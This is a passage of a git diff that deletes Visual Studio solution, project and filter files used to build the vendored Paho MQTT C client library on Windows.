-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "paho-mqtt3cs", "paho-mqtt3cs\paho-mqtt3cs.vcxproj", "{17F07F98-AA5F-4373-9877-992A341D650A}"
-EndProject
-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "test1", "test1\test1.vcxproj", "{4E643090-289D-487D-BCA8-685EA2210480}"
-	ProjectSection(ProjectDependencies) = postProject
-		{172F8995-C780-44A1-996C-C7949B4DB35A} = {172F8995-C780-44A1-996C-C7949B4DB35A}
-	EndProjectSection
-EndProject
-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "test3", "test3\test3.vcxproj", "{0CBDD939-F0C9-4887-8C7E-9E645C34FF94}"
-EndProject
-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "test4", "test4\test4.vcxproj", "{29D6A4E9-5A39-4CD3-8A24-348A34832405}"
-EndProject
-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "test5", "test5\test5.vcxproj", "{B8A895EA-C8DE-4235-B4B4-06889BBBDC93}"
-EndProject
-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "test9", "test9\test9.vcxproj", "{D133C05E-87A6-48C6-A703-188A83B82400}"
-EndProject
-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "test2", "test2\test2.vcxproj", "{A4E14611-05DC-40A1-815B-DA30CA167C9B}"
-EndProject
-Global
-	GlobalSection(SolutionConfigurationPlatforms) = preSolution
-		Debug|Win32 = Debug|Win32
-		Debug|x64 = Debug|x64
-		Release|Win32 = Release|Win32
-		Release|x64 = Release|x64
-	EndGlobalSection
-	GlobalSection(ProjectConfigurationPlatforms) = postSolution
-		{172F8995-C780-44A1-996C-C7949B4DB35A}.Debug|Win32.ActiveCfg = Debug|Win32
-		{172F8995-C780-44A1-996C-C7949B4DB35A}.Debug|Win32.Build.0 = Debug|Win32
-		{172F8995-C780-44A1-996C-C7949B4DB35A}.Debug|x64.ActiveCfg = Debug|x64
-		{172F8995-C780-44A1-996C-C7949B4DB35A}.Debug|x64.Build.0 = Debug|x64
-		{172F8995-C780-44A1-996C-C7949B4DB35A}.Release|Win32.ActiveCfg = Release|Win32
-		{172F8995-C780-44A1-996C-C7949B4DB35A}.Release|Win32.Build.0 = Release|Win32
-		{172F8995-C780-44A1-996C-C7949B4DB35A}.Release|x64.ActiveCfg = Release|x64
-		{172F8995-C780-44A1-996C-C7949B4DB35A}.Release|x64.Build.0 = Release|x64
-		{B479B6EF-787D-4716-912A-E0F6F7BDA7A9}.Debug|Win32.ActiveCfg = Debug|Win32
-		{B479B6EF-787D-4716-912A-E0F6F7BDA7A9}.Debug|Win32.Build.0 = Debug|Win32
-		{B479B6EF-787D-4716-912A-E0F6F7BDA7A9}.Debug|x64.ActiveCfg = Debug|x64
-		{B479B6EF-787D-4716-912A-E0F6F7BDA7A9}.Debug|x64.Build.0 = Debug|x64
-		{B479B6EF-787D-4716-912A-E0F6F7BDA7A9}.Release|Win32.ActiveCfg = Release|Win32
-		{B479B6EF-787D-4716-912A-E0F6F7BDA7A9}.Release|Win32.Build.0 = Release|Win32
-		{B479B6EF-787D-4716-912A-E0F6F7BDA7A9}.Release|x64.ActiveCfg = Release|x64
-		{B479B6EF-787D-4716-912A-E0F6F7BDA7A9}.Release|x64.Build.0 = Release|x64
-		{DFDF6238-DA97-4474-84C2-D313E8B985AE}.Debug|Win32.ActiveCfg = Debug|Win32
-		{DFDF6238-DA97-4474-84C2-D313E8B985AE}.Debug|Win32.Build.0 = Debug|Win32
-		{DFDF6238-DA97-4474-84C2-D313E8B985AE}.Debug|x64.ActiveCfg = Debug|x64
-		{DFDF6238-DA97-4474-84C2-D313E8B985AE}.Debug|x64.Build.0 = Debug|x64
-		{DFDF6238-DA97-4474-84C2-D313E8B985AE}.Release|Win32.ActiveCfg = Release|Win32
-		{DFDF6238-DA97-4474-84C2-D313E8B985AE}.Release|Win32.Build.0 = Release|Win32
-		{DFDF6238-DA97-4474-84C2-D313E8B985AE}.Release|x64.ActiveCfg = Release|x64
-		{DFDF6238-DA97-4474-84C2-D313E8B985AE}.Release|x64.Build.0 = Release|x64
-		{AF322561-C692-43D3-8502-CC1E6CD2869A}.Debug|Win32.ActiveCfg = Debug|Win32
-		{AF322561-C692-43D3-8502-CC1E6CD2869A}.Debug|Win32.Build.0 = Debug|Win32
-		{AF322561-C692-43D3-8502-CC1E6CD2869A}.Debug|x64.ActiveCfg = Debug|x64
-		{AF322561-C692-43D3-8502-CC1E6CD2869A}.Debug|x64.Build.0 = Debug|x64
-		{AF322561-C692-43D3-8502-CC1E6CD2869A}.Release|Win32.ActiveCfg = Release|Win32
-		{AF322561-C692-43D3-8502-CC1E6CD2869A}.Release|Win32.Build.0 = Release|Win32
-		{AF322561-C692-43D3-8502-CC1E6CD2869A}.Release|x64.ActiveCfg = Release|x64
-		{AF322561-C692-43D3-8502-CC1E6CD2869A}.Release|x64.Build.0 = Release|x64
-		{6EFC1F3B-CEE1-4DD2-80B4-CEC37954D468}.Debug|Win32.ActiveCfg = Debug|Win32
-		{6EFC1F3B-CEE1-4DD2-80B4-CEC37954D468}.Debug|Win32.Build.0 = Debug|Win32
-		{6EFC1F3B-CEE1-4DD2-80B4-CEC37954D468}.Debug|x64.ActiveCfg = Debug|x64
-		{6EFC1F3B-CEE1-4DD2-80B4-CEC37954D468}.Debug|x64.Build.0 = Debug|x64
-		{6EFC1F3B-CEE1-4DD2-80B4-CEC37954D468}.Release|Win32.ActiveCfg = Release|Win32
-		{6EFC1F3B-CEE1-4DD2-80B4-CEC37954D468}.Release|Win32.Build.0 = Release|Win32
-		{6EFC1F3B-CEE1-4DD2-80B4-CEC37954D468}.Release|x64.ActiveCfg = Release|x64
-		{6EFC1F3B-CEE1-4DD2-80B4-CEC37954D468}.Release|x64.Build.0 = Release|x64
-		{DEF21D1B-CB65-4A78-805F-CF421249EB83}.Debug|Win32.ActiveCfg = Debug|Win32
-		{DEF21D1B-CB65-4A78-805F-CF421249EB83}.Debug|Win32.Build.0 = Debug|Win32
-		{DEF21D1B-CB65-4A78-805F-CF421249EB83}.Debug|x64.ActiveCfg = Debug|x64
-		{DEF21D1B-CB65-4A78-805F-CF421249EB83}.Debug|x64.Build.0 = Debug|x64
-		{DEF21D1B-CB65-4A78-805F-CF421249EB83}.Release|Win32.ActiveCfg = Release|Win32
-		{DEF21D1B-CB65-4A78-805F-CF421249EB83}.Release|Win32.Build.0 = Release|Win32
-		{DEF21D1B-CB65-4A78-805F-CF421249EB83}.Release|x64.ActiveCfg = Release|x64
-		{DEF21D1B-CB65-4A78-805F-CF421249EB83}.Release|x64.Build.0 = Release|x64
-		{17F07F98-AA5F-4373-9877-992A341D650A}.Debug|Win32.ActiveCfg = Debug|Win32
-		{17F07F98-AA5F-4373-9877-992A341D650A}.Debug|Win32.Build.0 = Debug|Win32
-		{17F07F98-AA5F-4373-9877-992A341D650A}.Debug|x64.ActiveCfg = Debug|x64
-		{17F07F98-AA5F-4373-9877-992A341D650A}.Debug|x64.Build.0 = Debug|x64
-		{17F07F98-AA5F-4373-9877-992A341D650A}.Release|Win32.ActiveCfg = Release|Win32
-		{17F07F98-AA5F-4373-9877-992A341D650A}.Release|Win32.Build.0 = Release|Win32
-		{17F07F98-AA5F-4373-9877-992A341D650A}.Release|x64.ActiveCfg = Release|x64
-		{17F07F98-AA5F-4373-9877-992A341D650A}.Release|x64.Build.0 = Release|x64
-		{4E643090-289D-487D-BCA8-685EA2210480}.Debug|Win32.ActiveCfg = Debug|Win32
-		{4E643090-289D-487D-BCA8-685EA2210480}.Debug|Win32.Build.0 = Debug|Win32
-		{4E643090-289D-487D-BCA8-685EA2210480}.Debug|x64.ActiveCfg = Debug|x64
-		{4E643090-289D-487D-BCA8-685EA2210480}.Debug|x64.Build.0 = Debug|x64
-		{4E643090-289D-487D-BCA8-685EA2210480}.Release|Win32.ActiveCfg = Release|Win32
-		{4E643090-289D-487D-BCA8-685EA2210480}.Release|Win32.Build.0 = Release|Win32
-		{4E643090-289D-487D-BCA8-685EA2210480}.Release|x64.ActiveCfg = Release|x64
-		{4E643090-289D-487D-BCA8-685EA2210480}.Release|x64.Build.0 = Release|x64
-		{0CBDD939-F0C9-4887-8C7E-9E645C34FF94}.Debug|Win32.ActiveCfg = Debug|Win32
-		{0CBDD939-F0C9-4887-8C7E-9E645C34FF94}.Debug|Win32.Build.0 = Debug|Win32
-		{0CBDD939-F0C9-4887-8C7E-9E645C34FF94}.Debug|x64.ActiveCfg = Debug|x64
-		{0CBDD939-F0C9-4887-8C7E-9E645C34FF94}.Debug|x64.Build.0 = Debug|x64
-		{0CBDD939-F0C9-4887-8C7E-9E645C34FF94}.Release|Win32.ActiveCfg = Release|Win32
-		{0CBDD939-F0C9-4887-8C7E-9E645C34FF94}.Release|Win32.Build.0 = Release|Win32
-		{0CBDD939-F0C9-4887-8C7E-9E645C34FF94}.Release|x64.ActiveCfg = Release|x64
-		{0CBDD939-F0C9-4887-8C7E-9E645C34FF94}.Release|x64.Build.0 = Release|x64
-		{29D6A4E9-5A39-4CD3-8A24-348A34832405}.Debug|Win32.ActiveCfg = Debug|Win32
-		{29D6A4E9-5A39-4CD3-8A24-348A34832405}.Debug|Win32.Build.0 = Debug|Win32
-		{29D6A4E9-5A39-4CD3-8A24-348A34832405}.Debug|x64.ActiveCfg = Debug|x64
-		{29D6A4E9-5A39-4CD3-8A24-348A34832405}.Debug|x64.Build.0 = Debug|x64
-		{29D6A4E9-5A39-4CD3-8A24-348A34832405}.Release|Win32.ActiveCfg = Release|Win32
-		{29D6A4E9-5A39-4CD3-8A24-348A34832405}.Release|Win32.Build.0 = Release|Win32
-		{29D6A4E9-5A39-4CD3-8A24-348A34832405}.Release|x64.ActiveCfg = Release|x64
-		{29D6A4E9-5A39-4CD3-8A24-348A34832405}.Release|x64.Build.0 = Release|x64
-		{B8A895EA-C8DE-4235-B4B4-06889BBBDC93}.Debug|Win32.ActiveCfg = Debug|Win32
-		{B8A895EA-C8DE-4235-B4B4-06889BBBDC93}.Debug|Win32.Build.0 = Debug|Win32
-		{B8A895EA-C8DE-4235-B4B4-06889BBBDC93}.Debug|x64.ActiveCfg = Debug|x64
-		{B8A895EA-C8DE-4235-B4B4-06889BBBDC93}.Debug|x64.Build.0 = Debug|x64
-		{B8A895EA-C8DE-4235-B4B4-06889BBBDC93}.Release|Win32.ActiveCfg = Release|Win32
-		{B8A895EA-C8DE-4235-B4B4-06889BBBDC93}.Release|Win32.Build.0 = Release|Win32
-		{B8A895EA-C8DE-4235-B4B4-06889BBBDC93}.Release|x64.ActiveCfg = Release|x64
-		{B8A895EA-C8DE-4235-B4B4-06889BBBDC93}.Release|x64.Build.0 = Release|x64
-		{D133C05E-87A6-48C6-A703-188A83B82400}.Debug|Win32.ActiveCfg = Debug|Win32
-		{D133C05E-87A6-48C6-A703-188A83B82400}.Debug|Win32.Build.0 = Debug|Win32
-		{D133C05E-87A6-48C6-A703-188A83B82400}.Debug|x64.ActiveCfg = Debug|Win32
-		{D133C05E-87A6-48C6-A703-188A83B82400}.Release|Win32.ActiveCfg = Release|Win32
-		{D133C05E-87A6-48C6-A703-188A83B82400}.Release|Win32.Build.0 = Release|Win32
-		{D133C05E-87A6-48C6-A703-188A83B82400}.Release|x64.ActiveCfg = Release|x64
-		{D133C05E-87A6-48C6-A703-188A83B82400}.Release|x64.Build.0 = Release|x64
-		{A4E14611-05DC-40A1-815B-DA30CA167C9B}.Debug|Win32.ActiveCfg = Debug|Win32
-		{A4E14611-05DC-40A1-815B-DA30CA167C9B}.Debug|Win32.Build.0 = Debug|Win32
-		{A4E14611-05DC-40A1-815B-DA30CA167C9B}.Debug|x64.ActiveCfg = Debug|Win32
-		{A4E14611-05DC-40A1-815B-DA30CA167C9B}.Release|Win32.ActiveCfg = Release|Win32
-		{A4E14611-05DC-40A1-815B-DA30CA167C9B}.Release|Win32.Build.0 = Release|Win32
-		{A4E14611-05DC-40A1-815B-DA30CA167C9B}.Release|x64.ActiveCfg = Release|x64
-		{A4E14611-05DC-40A1-815B-DA30CA167C9B}.Release|x64.Build.0 = Release|x64
-	EndGlobalSection
-	GlobalSection(SolutionProperties) = preSolution
-		HideSolutionNode = FALSE
-	EndGlobalSection
-EndGlobal
diff --git a/thirdparty/paho.mqtt.c/Windows Build/paho-mqtt3a/paho-mqtt3a.vcxproj b/thirdparty/paho.mqtt.c/Windows Build/paho-mqtt3a/paho-mqtt3a.vcxproj
deleted file mode 100644
index da018c8..0000000
--- a/thirdparty/paho.mqtt.c/Windows Build/paho-mqtt3a/paho-mqtt3a.vcxproj
+++ /dev/null
@@ -1,202 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>
-<Project DefaultTargets="Build" ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
-  <ItemGroup Label="ProjectConfigurations">
-    <ProjectConfiguration Include="Debug|Win32">
-      <Configuration>Debug</Configuration>
-      <Platform>Win32</Platform>
-    </ProjectConfiguration>
-    <ProjectConfiguration Include="Debug|x64">
-      <Configuration>Debug</Configuration>
-      <Platform>x64</Platform>
-    </ProjectConfiguration>
-    <ProjectConfiguration Include="Release|Win32">
-      <Configuration>Release</Configuration>
-      <Platform>Win32</Platform>
-    </ProjectConfiguration>
-    <ProjectConfiguration Include="Release|x64">
-      <Configuration>Release</Configuration>
-      <Platform>x64</Platform>
-    </ProjectConfiguration>
-  </ItemGroup>
-  <PropertyGroup Label="Globals">
-    <ProjectGuid>{B479B6EF-787D-4716-912A-E0F6F7BDA7A9}</ProjectGuid>
-    <Keyword>Win32Proj</Keyword>
-    <RootNamespace>pahomqtt3a</RootNamespace>
-    <WindowsTargetPlatformVersion>10.0.14393.0</WindowsTargetPlatformVersion>
-  </PropertyGroup>
-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
-    <ConfigurationType>DynamicLibrary</ConfigurationType>
-    <UseDebugLibraries>true</UseDebugLibraries>
-    <CharacterSet>Unicode</CharacterSet>
-    <PlatformToolset>v141</PlatformToolset>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
-    <ConfigurationType>DynamicLibrary</ConfigurationType>
-    <UseDebugLibraries>true</UseDebugLibraries>
-    <CharacterSet>Unicode</CharacterSet>
-    <PlatformToolset>v141</PlatformToolset>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
-    <ConfigurationType>DynamicLibrary</ConfigurationType>
-    <UseDebugLibraries>false</UseDebugLibraries>
-    <WholeProgramOptimization>true</WholeProgramOptimization>
-    <CharacterSet>Unicode</CharacterSet>
-    <PlatformToolset>v141</PlatformToolset>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
-    <ConfigurationType>DynamicLibrary</ConfigurationType>
-    <UseDebugLibraries>false</UseDebugLibraries>
-    <WholeProgramOptimization>true</WholeProgramOptimization>
-    <CharacterSet>Unicode</CharacterSet>
-    <PlatformToolset>v141</PlatformToolset>
-  </PropertyGroup>
-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
-  <ImportGroup Label="ExtensionSettings">
-  </ImportGroup>
-  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
-  </ImportGroup>
-  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
-  </ImportGroup>
-  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
-  </ImportGroup>
-  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
-  </ImportGroup>
-  <PropertyGroup Label="UserMacros" />
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
-    <LinkIncremental>true</LinkIncremental>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
-    <LinkIncremental>true</LinkIncremental>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
-    <LinkIncremental>false</LinkIncremental>
-    <OutDir>$(SolutionDir)..\build\output\</OutDir>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
-    <LinkIncremental>false</LinkIncremental>
-  </PropertyGroup>
-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
-    <ClCompile>
-      <PrecompiledHeader>
-      </PrecompiledHeader>
-      <WarningLevel>Level3</WarningLevel>
-      <Optimization>Disabled</Optimization>
-      <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;PAHOMQTT3A_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
-      <DisableSpecificWarnings>4996</DisableSpecificWarnings>
-    </ClCompile>
-    <Link>
-      <SubSystem>Windows</SubSystem>
-      <GenerateDebugInformation>true</GenerateDebugInformation>
-      <AdditionalDependencies>ws2_32.lib;%(AdditionalDependencies)</AdditionalDependencies>
-    </Link>
-  </ItemDefinitionGroup>
-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
-    <ClCompile>
-      <PrecompiledHeader>
-      </PrecompiledHeader>
-      <WarningLevel>Level3</WarningLevel>
-      <Optimization>Disabled</Optimization>
-      <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;PAHOMQTT3A_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
-      <DisableSpecificWarnings>4996</DisableSpecificWarnings>
-    </ClCompile>
-    <Link>
-      <SubSystem>Windows</SubSystem>
-      <GenerateDebugInformation>true</GenerateDebugInformation>
-      <AdditionalDependencies>ws2_32.lib;%(AdditionalDependencies)</AdditionalDependencies>
-    </Link>
-  </ItemDefinitionGroup>
-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
-    <ClCompile>
-      <WarningLevel>Level3</WarningLevel>
-      <PrecompiledHeader>
-      </PrecompiledHeader>
-      <Optimization>MaxSpeed</Optimization>
-      <FunctionLevelLinking>true</FunctionLevelLinking>
-      <IntrinsicFunctions>true</IntrinsicFunctions>
-      <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;PAHOMQTT3A_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
-      <DisableSpecificWarnings>4996</DisableSpecificWarnings>
-    </ClCompile>
-    <Link>
-      <SubSystem>Windows</SubSystem>
-      <GenerateDebugInformation>true</GenerateDebugInformation>
-      <EnableCOMDATFolding>true</EnableCOMDATFolding>
-      <OptimizeReferences>true</OptimizeReferences>
-      <AdditionalDependencies>ws2_32.lib;%(AdditionalDependencies)</AdditionalDependencies>
-    </Link>
-  </ItemDefinitionGroup>
-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
-    <ClCompile>
-      <WarningLevel>Level3</WarningLevel>
-      <PrecompiledHeader>
-      </PrecompiledHeader>
-      <Optimization>MaxSpeed</Optimization>
-      <FunctionLevelLinking>true</FunctionLevelLinking>
-      <IntrinsicFunctions>true</IntrinsicFunctions>
-      <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;PAHOMQTT3A_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
-      <DisableSpecificWarnings>4996</DisableSpecificWarnings>
-    </ClCompile>
-    <Link>
-      <SubSystem>Windows</SubSystem>
-      <GenerateDebugInformation>true</GenerateDebugInformation>
-      <EnableCOMDATFolding>true</EnableCOMDATFolding>
-      <OptimizeReferences>true</OptimizeReferences>
-      <AdditionalDependencies>ws2_32.lib;%(AdditionalDependencies)</AdditionalDependencies>
-    </Link>
-  </ItemDefinitionGroup>
-  <ItemGroup>
-    <ClCompile Include="..\..\src\Clients.c" />
-    <ClCompile Include="..\..\src\Heap.c" />
-    <ClCompile Include="..\..\src\LinkedList.c" />
-    <ClCompile Include="..\..\src\Log.c" />
-    <ClCompile Include="..\..\src\Messages.c" />
-    <ClCompile Include="..\..\src\MQTTAsync.c" />
-    <ClCompile Include="..\..\src\MQTTPacket.c" />
-    <ClCompile Include="..\..\src\MQTTPacketOut.c" />
-    <ClCompile Include="..\..\src\MQTTPersistence.c" />
-    <ClCompile Include="..\..\src\MQTTPersistenceDefault.c" />
-    <ClCompile Include="..\..\src\MQTTProtocolClient.c" />
-    <ClCompile Include="..\..\src\MQTTProtocolOut.c" />
-    <ClCompile Include="..\..\src\MQTTVersion.c" />
-    <ClCompile Include="..\..\src\Socket.c" />
-    <ClCompile Include="..\..\src\SocketBuffer.c" />
-    <ClCompile Include="..\..\src\SSLSocket.c" />
-    <ClCompile Include="..\..\src\StackTrace.c" />
-    <ClCompile Include="..\..\src\Thread.c" />
-    <ClCompile Include="..\..\src\Tree.c" />
-    <ClCompile Include="..\..\src\utf-8.c" />
-  </ItemGroup>
-  <ItemGroup>
-    <ClInclude Include="..\..\src\Clients.h" />
-    <ClInclude Include="..\..\src\Heap.h" />
-    <ClInclude Include="..\..\src\LinkedList.h" />
-    <ClInclude Include="..\..\src\Log.h" />
-    <ClInclude Include="..\..\src\Messages.h" />
-    <ClInclude Include="..\..\src\MQTTAsync.h" />
-    <ClInclude Include="..\..\src\MQTTClient.h" />
-    <ClInclude Include="..\..\src\MQTTClientPersistence.h" />
-    <ClInclude Include="..\..\src\MQTTPacket.h" />
-    <ClInclude Include="..\..\src\MQTTPacketOut.h" />
-    <ClInclude Include="..\..\src\MQTTPersistence.h" />
-    <ClInclude Include="..\..\src\MQTTPersistenceDefault.h" />
-    <ClInclude Include="..\..\src\MQTTProtocol.h" />
-    <ClInclude Include="..\..\src\MQTTProtocolClient.h" />
-    <ClInclude Include="..\..\src\MQTTProtocolOut.h" />
-    <ClInclude Include="..\..\src\Socket.h" />
-    <ClInclude Include="..\..\src\SocketBuffer.h" />
-    <ClInclude Include="..\..\src\SSLSocket.h" />
-    <ClInclude Include="..\..\src\StackTrace.h" />
-    <ClInclude Include="..\..\src\Thread.h" />
-    <ClInclude Include="..\..\src\Tree.h" />
-    <ClInclude Include="..\..\src\utf-8.h" />
-    <ClInclude Include="..\paho-mqtt3c\stdafx.h" />
-    <ClInclude Include="..\paho-mqtt3c\targetver.h" />
-  </ItemGroup>
-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
-  <ImportGroup Label="ExtensionTargets">
-  </ImportGroup>
-</Project>
\ No newline at end of file
diff --git a/thirdparty/paho.mqtt.c/Windows Build/paho-mqtt3a/paho-mqtt3a.vcxproj.filters b/thirdparty/paho.mqtt.c/Windows Build/paho-mqtt3a/paho-mqtt3a.vcxproj.filters
deleted file mode 100644
index b142753..0000000
--- a/thirdparty/paho.mqtt.c/Windows Build/paho-mqtt3a/paho-mqtt3a.vcxproj.filters
+++ /dev/null
@@ -1,153 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>
-<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
-  <ItemGroup>
-    <Filter Include="Source Files">
-      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
-      <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
-    </Filter>
-    <Filter Include="Header Files">
-      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
-      <Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions>
-    </Filter>
-    <Filter Include="Resource Files">
-      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
-      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
-    </Filter>
-  </ItemGroup>
-  <ItemGroup>
-    <ClCompile Include="..\..\src\Clients.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\utf-8.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\Heap.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\LinkedList.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\Log.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\Messages.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\MQTTPacket.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\MQTTPacketOut.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\MQTTPersistence.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\MQTTPersistenceDefault.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\MQTTProtocolClient.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\MQTTProtocolOut.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\MQTTVersion.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\Socket.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\SocketBuffer.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\SSLSocket.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\StackTrace.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\Thread.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\Tree.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\MQTTAsync.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-  </ItemGroup>
-  <ItemGroup>
-    <ClInclude Include="..\..\src\Clients.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\utf-8.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\Heap.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\LinkedList.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\Log.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\Messages.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\MQTTAsync.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\MQTTClient.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\MQTTClientPersistence.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\MQTTPacket.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\MQTTPacketOut.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\MQTTPersistence.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\MQTTPersistenceDefault.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\MQTTProtocol.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\MQTTProtocolClient.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\MQTTProtocolOut.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\Socket.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\SocketBuffer.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\SSLSocket.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\StackTrace.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\paho-mqtt3c\stdafx.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\paho-mqtt3c\targetver.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\Thread.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\Tree.h">
